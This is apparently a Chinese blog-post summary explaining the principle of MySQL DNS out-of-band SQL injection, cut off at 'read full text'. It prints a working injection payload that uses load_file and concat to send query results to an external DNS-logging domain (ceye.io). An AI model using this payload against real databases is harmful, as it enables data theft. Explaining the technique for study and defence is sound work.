摘要： 一、原理 攻击者向 mysql 数据库提交注入语句 ?id=1' and if((select load_file(concat('\\\\',(攻击代码),'.xxxxxx.ceye.io\\abc'))),1,0)--+ if(x,1,0) 如果x为真，则输出1，假则输出0 load_file( 阅读全文